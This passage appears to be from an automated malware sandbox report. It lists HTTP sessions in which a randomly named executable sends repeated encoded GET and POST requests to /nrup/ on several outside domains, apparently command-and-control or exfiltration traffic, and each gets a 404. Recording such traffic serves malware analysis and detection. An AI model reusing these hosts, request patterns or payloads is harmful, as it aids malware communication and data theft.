4c 2f 6c 58 38 37 59 47 [TRUNCATED] Data Ascii: pX6dR=dTqpdRaduNGDX5X637q89F337xmmdnzpin22MYqoR7ZcfgkE/eGdkO32xmM2kMHuLB/q9PnzNE9jr5MK7tsWYUaBwH6Ql9GRuSBF5SOS/9vE/B7YcPqjbin1qFmY1VM2wt7NT9PYJb4NnKdwTf1txE0ENB2fnPXDr15NoZyvtsihWvNm+0KGEANO/5ShE+MwfqG10w/8IHTJzymwQRIxBGwAJBczv/nIopMPFO4DzJW8IGCqXc5SCtegO2HkVep2f4xCX8dC4z4S6LuAgzIkdzxtpzjmUz9zPI/p8+7OnAZPF69mLuTUH5f0qf00gOdI8nc9L/lX87YGQNQ1fJ9gV4BOBiGiO6SytAcA7cc1FE08KYZXGQywidLh2uHrILpBj4w99v8nkGHqGp+eH/A87odjfpaHKmS3DXFkY6nv9hYalxU++IqRw75c9/7PLkIweCYmxylioRYCxfoIJKRQOBr/csHsTsoRrzWAotQiMaETMG+mNyd1igE8RzcPdJ2/1my4CEWKzwrJXn2OkxWZhDcVo80hwP4Ot7zXufwwuM4bCd+nrAun2j5TIxepJDEQa3QsxedeYJqVr5sU3J/gBpl+mnIqHAWZn3aQxibX7JXrFwYUPatFxx8ZHzSgtQwJsWJGuCTvgq+hJnKZmx5ZkIRR34z4aH6cItiJL2EIp8wHA7ZkBpPg370Wb56sjSzW4eFyfOtSSs4OGv4BdFAKzLlp4OdzjE1LLY0rC/QgRErczfsK4kpYRXGR+CUBS4ZmS/21oSm2M6NKBwkYIwxf08lFC3ICACBC/WCOQ2XyMpcZww+fzxsi/mDNdVR8Gc8ZuKMRcBA+xidVwTF+QhXRvslQPGsrFzi5M6VFkYCzUYiMu+WIlXxQz5L1Xd+UBgSRVD3NRPvRWrhTB0TilKqZRb0lfJYwoMrK8F2IpmcLyOay5iM4o9fQ/+y6h/Zyb3Pb1QRjCjRQ7CsfPj9t9BHi5xSuVHxD/7o0r3IixXdzBq795W [TRUNCATED]
May 3, 2024 11:34:12.374063015 CEST	1598	OUT	Data Raw: 6b 30 32 57 35 7a 6a 47 6c 34 2b 79 4d 62 59 52 33 50 53 53 53 4e 53 58 4e 4a 43 2f 78 32 65 66 42 56 70 66 39 39 41 69 78 53 45 4a 6e 33 6a 74 30 6f 64 4c 79 31 73 5a 77 74 6b 41 33 4f 79 2f 43 44 52 53 67 2f 76 71 6d 50 37 2b 48 5a 75 4b 6b 79 Data Ascii: k02W5zjGl4+yMbYR3PSSSNSXNJC/x2efBVpf99AixSEJn3jt0odLy1sZwtkA3Oy/CDRSg/vqmP7+HZuKkykUThgE9LA0/t52sv0OnccKJKZ1Qt6bEDLJLJJeW6xk7Rj301uA18WOqGaJKvPnuasa0buScB1n1sVUkL2y8pt1kUXY06y/fN/4GiKiWphFUC4uEi8t2R+9NYWEBq4b77w1/Bl6shHhTf2F/rfLabyWT/EaADRiiFw
May 3, 2024 11:34:12.549895048 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:34:12 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.22	49189	217.26.48.101	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:14.888434887 CEST	471	OUT	GET /nrup/?pX6dR=QRCJemSun6KfUPjb2qqlqGicxCzmZViyr2LzNdaeeYxuOQk1p7mHourK8lVarsbBIBvr9aHYFlgCj6kd/MlaSQeL42icjeH9s29nuCeOpLeM+yzNa72Kcg7xsQaX&tv=6TdD8B HTTP/1.1 Host: www.nimaster.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:34:15.064352989 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:34:14 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.22	49190	46.28.105.2	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:26.089179039 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.deniztemiz.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.deniztemiz.fun Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.deniztemiz.fun/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 36 4d 52 54 38 61 68 4f 30 66 65 30 4c 42 54 44 6e 6c 6b 61 61 64 6f 49 33 67 45 46 4f 79 70 74 4f 47 4a 56 49 39 57 70 51 32 4b 6e 7a 45 61 30 66 5a 57 34 78 55 32 33 78 6e 70 73 56 35 58 51 53 4a 45 56 6e 37 6e 65 4a 42 32 46 79 6c 46 30 35 4c 47 51 31 38 51 71 2b 48 58 48 38 65 34 59 2f 59 63 64 32 72 67 4f 38 4c 4c 50 57 51 7a 63 31 6e 31 70 68 46 74 58 4e 64 72 43 79 6c 79 56 42 58 4e 6b 33 43 78 6f 73 48 2f 6b 77 50 79 78 54 52 30 36 72 70 62 30 4d 7a 69 37 59 56 62 59 69 6d 42 77 6a 46 6d 49 30 71 44 77 36 50 2b 35 32 70 76 52 41 37 52 59 55 78 73 49 32 44 42 48 68 32 72 2b 6f 42 35 6d 4f 79 53 64 6c 6c 4e 72 57 35 6d 5a 6d 66 65 67 59 2b 50 71 6c 49 44 32 38 47 35 53 6a 6d 50 6a 2f 49 31 76 39 32 55 78 67 69 78 48 54 50 6f 4c 76 61 65 50 46 75 70 6e 36 7a 30 78 52 42 54 47 44 31 4b 4d 69 38 2b 4d 62 6b 4c 58 46 35 4e 48 58 58 4d 54 43 4f 41 44 34 4d 7a 52 63 73 6e 66 4e 4e 4f 39 4a 78 4d 59 63 57 67 4a 45 44 59 55 68 4a 75 31 6d 62 58 64 61 57 4d 69 53 59 2f 5a 63 48 46 72 [TRUNCATED] Data Ascii: pX6dR=6MRT8ahO0fe0LBTDnlkaadoI3gEFOyptOGJVI9WpQ2KnzEa0fZW4xU23xnpsV5XQSJEVn7neJB2FylF05LGQ18Qq+HXH8e4Y/Ycd2rgO8LLPWQzc1n1phFtXNdrCylyVBXNk3CxosH/kwPyxTR06rpb0Mzi7YVbYimBwjFmI0qDw6P+52pvRA7RYUxsI2DBHh2r+oB5mOySdllNrW5mZmfegY+PqlID28G5SjmPj/I1v92UxgixHTPoLvaePFupn6z0xRBTGD1KMi8+MbkLXF5NHXXMTCOAD4MzRcsnfNNO9JxMYcWgJEDYUhJu1mbXdaWMiSY/ZcHFrXdSNib/iDGLSye8LdAHyJMSh1AQLYc3H7UDGGcfOeqYy3a3MVL7htYC8TpMPPQQE5fPJ0HO22PjkucC25aip2lSznrEg+LeNrN9H3NRyoWh6t00wxvAEyUuZB/WCWb/I4yZQLJCJ/FzTP8zOskylTUZbhER1PLLI2irb3ijcuMbKRuJYCtu10lMsObTDu5+FQXzDMlFFI6PD62Civ8L83OCkFM9hMsqMoF1lps3Extjr9jz/0dmObcrycNxjxaoYkvjKIClc8EDRqdbYxt6phRkeUcU+1pCyL6Qt5dUL259jfzQPhTozcVsh4YTUxw67jvb9yhPFow55ipS2euyfknewKGX5Ba55jLYLiQVPibhYC/ky6Oj+5CgZSW2hMiKx4jyIIJZM7EPEvnTqSiWjttTTaEiyhoMB9h3ia49JozrxZmlPYnpe90lP5XHGRW0gLLn46UO0CYWf69p80SbqmYqmVTPI2Cx49dByrON4u9PAVLxT4AguIfygA+cQoMcH10gk3xQxeNpQiHNqnGFwNwJShvGvb2QsDzc1jGR66eQ0Lc8gS9126zOwJ03TOLcDbYYSwC9aGQIVsDU4iDIPFI7i1a3fZ8AO6TNShz92Se87CJluTt2IhJDJt59vfpe8fcDf4idDF1FB3d3bIL0SBXCm9PPuBABiwH [TRUNCATED]
May 3, 2024 11:34:26.269872904 CEST	122	OUT	Data Raw: 4c 54 54 4c 6d 56 42 74 63 35 64 50 7a 50 71 46 2b 6b 30 65 4c 4c 50 56 33 44 63 75 70 6e 53 6e 63 52 4f 42 47 7a 46 69 67 59 61 77 62 78 4f 48 5a 42 68 65 4e 46 35 62 41 37 33 38 4b 74 31 31 2b 4c 65 58 70 4d 59 4f 72 2b 45 4d 68 70 30 66 41 73 Data Ascii: LTTLmVBtc5dPzPqF+k0eLLPV3DcupnSncROBGzFigYawbxOHZBheNF5bA738Kt11+LeXpMYOr+EMhp0fAsLVoJ1aQfcqcyUWc4rbdO+OKSWRz4Q/CrIi8uspHm
May 3, 2024 11:34:26.452478886 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:34:26 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.22	49191	46.28.105.2	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:28.808193922 CEST	739	OUT	POST /nrup/ HTTP/1.1 Host: www.deniztemiz.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.deniztemiz.fun Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.deniztemiz.fun/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 36 4d 52 54 38 61 68 4f 30 66 65 30 4c 43 4c 44 6b 55 6b 61 5a 39 6f 49 77 67 45 46 48 53 70 6a 4f 42 42 33 49 34 32 35 51 48 53 6e 77 52 2b 30 66 76 43 34 79 55 32 30 35 48 70 53 62 5a 57 4b 53 4a 45 76 6e 36 62 65 4a 42 79 46 7a 42 74 30 2f 4b 47 52 71 63 51 6f 78 6e 58 4b 38 65 30 37 2f 59 51 57 32 72 34 4f 38 4a 76 50 58 55 58 63 6a 6c 74 70 6b 31 74 52 4c 64 71 4b 79 6c 76 66 42 58 64 38 33 47 78 6f 73 57 7a 6b 2b 2b 53 78 55 41 30 36 68 4a 62 78 4c 7a 6a 78 62 51 6d 49 36 6d 52 42 2f 6d 33 70 35 70 2f 57 77 65 61 6a 33 4b 62 46 49 61 46 49 64 55 52 61 36 54 64 43 30 51 3d 3d Data Ascii: pX6dR=6MRT8ahO0fe0LCLDkUkaZ9oIwgEFHSpjOBB3I425QHSnwR+0fvC4yU205HpSbZWKSJEvn6beJByFzBt0/KGRqcQoxnXK8e07/YQW2r4O8JvPXUXcjltpk1tRLdqKylvfBXd83GxosWzk++SxUA06hJbxLzjxbQmI6mRB/m3p5p/Wweaj3KbFIaFIdURa6TdC0Q==
May 3, 2024 11:34:28.991292000 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:34:28 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.22	49192	46.28.105.2	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:31.510257959 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.deniztemiz.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.deniztemiz.fun Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.deniztemiz.fun/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 36 4d 52 54 38 61 68 4f 30 66 65 30 4b 6d 33 44 33 6a 51 61 4d 74 6f 50 31 67 45 46 4f 79 70 76 4f 47 4a 33 49 39 57 70 51 30 69 6e 7a 43 47 30 65 4a 57 34 77 55 32 30 79 6e 70 73 56 35 58 52 53 4e 56 51 6e 37 72 4f 4a 43 65 46 79 67 39 30 35 49 75 51 79 38 51 71 38 48 58 4a 38 65 30 75 2f 59 41 53 32 72 4d 6b 38 4a 6e 50 58 6d 2f 63 79 31 74 75 72 56 74 52 4c 64 72 46 79 6c 75 47 42 58 55 35 33 43 55 6a 73 46 72 6b 77 2f 79 78 48 78 30 37 6a 4a 62 39 49 7a 69 6c 59 56 66 68 69 6d 42 30 6a 46 6a 64 30 71 66 77 37 5a 79 35 32 71 58 57 63 62 52 58 62 52 73 49 34 6a 42 53 68 32 72 63 6f 42 35 6d 4f 32 53 64 71 56 4e 72 57 34 6d 59 6f 2f 65 67 45 75 50 7a 71 6f 4f 50 38 47 63 7a 6a 6d 66 7a 2f 37 5a 76 38 7a 41 78 6e 53 78 48 53 2f 6f 4e 76 61 65 34 4d 4f 6f 45 36 33 67 54 52 42 44 57 44 31 4b 4d 69 35 79 4d 66 32 6a 58 4d 4a 4e 48 49 6e 4d 53 4d 75 41 45 34 4e 47 45 63 73 44 66 4e 4a 4b 39 50 47 6f 59 4c 6b 59 49 4d 54 59 52 6c 4a 75 33 73 37 57 46 61 57 67 49 53 59 47 79 63 47 56 72 [TRUNCATED] Data Ascii: pX6dR=6MRT8ahO0fe0Km3D3jQaMtoP1gEFOypvOGJ3I9WpQ0inzCG0eJW4wU20ynpsV5XRSNVQn7rOJCeFyg905IuQy8Qq8HXJ8e0u/YAS2rMk8JnPXm/cy1turVtRLdrFyluGBXU53CUjsFrkw/yxHx07jJb9IzilYVfhimB0jFjd0qfw7Zy52qXWcbRXbRsI4jBSh2rcoB5mO2SdqVNrW4mYo/egEuPzqoOP8Gczjmfz/7Zv8zAxnSxHS/oNvae4MOoE63gTRBDWD1KMi5yMf2jXMJNHInMSMuAE4NGEcsDfNJK9PGoYLkYIMTYRlJu3s7WFaWgISYGycGVrXf6NyJbiD2LR4+9CZADuJMaf1AU9YanH6B7GP+3JAqYwwa3CRL7ltYHfTpsPIhYEjbzJx2O1hPisqcCbz6i92lXunuZr+7uNq99H1v51gmh/2E0c4PBbyUv+B7P3WqHI4yJQL/+J/FzSZMzIlEuHTUFfhEMwPOHI2y7b3m3cgMbKJeIQMNuV0lI8OfPTuJ6FeUrDOntFZKPd82ChhcKW3OSkFIlPMvqMok1lqN3EvNjv+jzw0dmsbcv2cNAYxZMYkujKKDlc+0DF5NbU1t6khRtZUfQH1tWyKawt1JIL2Z9tdzQP6DpmcVEX4Zvixya7geL96hPamQ52kpS3auyNknOwKGL5Bbh5i80LxT9PuLhedvlt0e/C5CwVSXyxMhOx3RaILLxPnEPdjHTwDyWPttTfaGSY0IsB+xXicqVKnzr8XGkZWHoh901x5WyDE3ogLLX45h60DoWf69p/0SbumYmUVXL22Cx4+o1yrcl4ldPPZrxEuAgKIfm0A+FHoNgH1lAk3xQ+b9pT43N1nGZXNwJ8hvKvaAIsMC81ik569+Q0Mc8hct116zPtJxHDOKcDap4S8mdVEgIUuDUq7TFXFJGh1Y7fZuEO8CNSmD92Ou80Kpl7dNKUhJP3t4tGYYO8NdTfoRlENlFApt3VILpyBX7r9KPhBHtizn [TRUNCATED]
May 3, 2024 11:34:31.691364050 CEST	1586	OUT	Data Raw: 69 46 58 4c 6d 54 52 64 63 4f 64 50 7a 6e 71 46 32 6f 30 66 57 51 50 51 62 44 63 73 42 6e 51 58 64 48 48 52 47 31 4c 43 68 46 61 77 66 4c 4f 48 52 76 68 65 64 46 35 62 73 37 32 64 36 74 6c 56 2b 4c 57 33 70 4a 56 75 72 73 41 4a 35 71 30 63 64 6a Data Ascii: iFXLmTRdcOdPznqF2o0fWQPQbDcsBnQXdHHRG1LChFawfLOHRvhedF5bs72d6tlV+LW3pJVursAJ5q0cdjejROjfEFQaE2dABdvaxA3fD6WD7aU8+AQFt6uP6x8Rah0i5OMVg2cIfMJ2a2gIuhNJMXWMqs7MBL0opb/JXbJhkwg6Wv0pn/nWreTeXOorPVQhZDHfWCR9MakW/jRa2jd9BdCFewsuvspx37Pkinbuo40LQHNdPz9
May 3, 2024 11:34:31.874905109 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:34:31 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.22	49193	46.28.105.2	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:34.210463047 CEST	473	OUT	GET /nrup/?pX6dR=3O5z/vVa1aiBIg/2yUkhN/MO21wODAA4MhhTC4igeHW13Qm1DZfDyX2p9mwAZMK6YdFTnsLdJzS54ToP+ZiK/fxP+mbVzf034bYs7rsq3IWOdGvb01xGoV1iE4GP&tv=6TdD8B HTTP/1.1 Host: www.deniztemiz.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:34:34.393316031 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:34:34 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.22	49194	162.240.81.18	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:34:39.726219893 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.agoraeubebo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.agoraeubebo.com Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.agoraeubebo.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 51 55 44 6a 32 34 42 73 59 4f 47 76 7a 4b 49 6d 32 6f 68 45 79 35 5a 39 4b 5a 48 56 65 39 68 33 78 5a 61 50 65 61 73 6c 56 71 33 31 4b 69 37 2b 52 75 69 42 5a 42 72 43 74 4a 76 2f 6a 74 6e 66 4e 37 65 70 36 48 6c 41 69 67 6b 34 73 43 55 48 4e 59 32 77 6b 6f 78 70 78 52 7a 69 31 58 71 33 6f 79 67 68 55 6f 32 32 4b 71 50 6e 43 57 66 54 63 68 37 4b 53 76 62 57 64 43 65 4d 6d 46 65 62 65 76 65 54 4c 77 6a 45 30 55 64 38 4c 39 79 64 2f 64 6a 52 44 32 63 53 62 73 35 70 38 4e 56 43 39 36 6f 6b 4a 6e 6e 7a 47 4c 65 55 57 6c 52 41 45 78 37 57 6e 31 33 72 53 4f 58 4d 52 77 34 78 31 56 33 63 70 4e 57 37 47 30 2f 59 45 54 4b 54 76 30 63 37 48 4c 57 70 2f 4c 54 62 30 6f 6c 67 67 4e 46 61 41 6d 43 32 52 45 39 37 30 6b 46 4b 73 61 33 49 30 6d 36 2f 6f 49 6c 73 7a 45 59 50 78 72 37 7a 31 72 39 69 77 34 74 64 50 42 6d 79 66 54 5a 2f 41 7a 39 43 64 4b 71 31 44 78 59 41 6c 52 2b 2f 69 66 42 35 33 67 43 5a 6d 75 69 68 5a 39 42 2b 73 51 4f 6b 32 30 75 48 44 71 35 58 35 63 33 65 66 5a 77 75 52 70 49 44 [TRUNCATED] Data Ascii: pX6dR=QUDj24BsYOGvzKIm2ohEy5Z9KZHVe9h3xZaPeaslVq31Ki7+RuiBZBrCtJv/jtnfN7ep6HlAigk4sCUHNY2wkoxpxRzi1Xq3oyghUo22KqPnCWfTch7KSvbWdCeMmFebeveTLwjE0Ud8L9yd/djRD2cSbs5p8NVC96okJnnzGLeUWlRAEx7Wn13rSOXMRw4x1V3cpNW7G0/YETKTv0c7HLWp/LTb0olggNFaAmC2RE970kFKsa3I0m6/oIlszEYPxr7z1r9iw4tdPBmyfTZ/Az9CdKq1DxYAlR+/ifB53gCZmuihZ9B+sQOk20uHDq5X5c3efZwuRpIDk4nAr/N8qLUUebtFoY+z1DE4nFkhYuOEAyx4PPhk+vKRKzY9JsZkeMf0e+udjcgabMy0Q5qjWfbeYIV37U6gwuH3GXRZazgn3EHf5F4Ir5HTTnVemskQexLOELGpxw5SSwWM0vVan7lXyeNX9KAY07O/WGg+h2qmlqmeV57N7Y6/q3MTlL+I3AE1wQZtwFZt3yUx6pYUJyFBQlXPHjDZDjC+m39HFWmQnv/C/kWbYybD/uxqg7LWVUg52YnRqQl3yequx+aTiMx3Z82W5Nb3fkINZNXA4advRKZtHnNlxUS+ANj7eW